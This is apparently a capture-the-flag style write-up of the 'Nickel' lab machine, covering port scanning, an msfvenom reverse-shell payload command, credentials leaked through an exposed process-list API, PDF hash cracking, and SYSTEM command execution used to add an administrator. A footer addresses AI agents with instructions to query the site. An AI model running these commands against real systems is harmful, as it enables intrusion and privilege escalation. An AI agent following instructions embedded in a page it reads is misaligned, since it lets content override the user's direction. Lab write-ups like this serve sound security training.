# Nickel ## Information Gathering ### Service Enumeration `nmapAutomator.sh -H 192.168.90.99 -t full` `nmapAutomator.sh -H 192.168.90.99 -t vulns` ![](/files/-Madc9yBhBUXjngbfuWQ) ### SMB (139) ![](/files/-MadcCdnJ2Tdv72s319q) `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python` ### HTTP On port 8089, we have a dashboard: ![](/files/-MadcG24-jf27BIrOFQ5) Each of the links bring us to 169.254.109.39:33333. By going to 192.168.90.99:33333 instead, we get a Not Found response for `/list-current-deployments`. ![](/files/-MadcIjCMFd_4CHnHxkV) We get a different message, however, for `/list-running-procs`. ![](/files/-MadcLDizjz-8OVQZ--g) If we send a POST request instead, we indeed see a list of running processes! ![](/files/-MadcNzZ2sGBG42VwDgl) In the command line of one of the processes, we get a user's credentials. ![](/files/-MadcRXrAms03CEPU5E2) Plugging the `-p` parameter into CyberChef, we can see that it is a Base 64 encoded password (`NowiseSloopTheory139`) ![](/files/-MadcdpGKznO8df7REyT) Using the credentials `ariah:NowiseSloopTheory139`, we can SSH into the server. ![](/files/-Madch-rRynNWf0WllFA) ![](/files/-MadcjyL3e0d8NQGSs-G) ## Privilege Escalation Using previously found credentials for `ariah`, we can access the FTP service and download a PDF file. ![](/files/-MadcmxlNY5XHeNWPUXD) However, a password is required. The previously found password does not work. ![](/files/-MadcusSzyGqmXlTzxho) Use `pdf2john.pl` to extract the hash. `perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt` Use John the Ripper to crack the hash. `john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt` ![](/files/-Madd2d3-dAp4dFUQAu5) The password is `ariah4168`. Here, we find a 'Temporary Command endpoint' at `http://nickel/` that is only accessible through the remote machine. ![](/files/-MaddNfwv6V0xyZ6_Cp8) Using Powershell, we can send a GET request to the API endpoint. `$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing` This executes `whoami`, and we can see the output below. ![](/files/-MaddeooDXYRfVag101z) We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing - adding ourselves to the `Administrators` group. `localgroup Administrators ariah /add` ![](/files/-Maddi-WO9AwVUhIlUY3) If we check the Administrators group again (`net localgroup Administrators`), we can see that our user `ariah` was added. ![](/files/-Madf3eW89-4k9VCyTkd) Now, we can RDP into the machine and run the command prompt as Administrator. ![](/files/-MadfTe8Yr3A1hWHFp7y) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentesting.zeyu2001.com/proving-grounds/get-to-work/nickel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.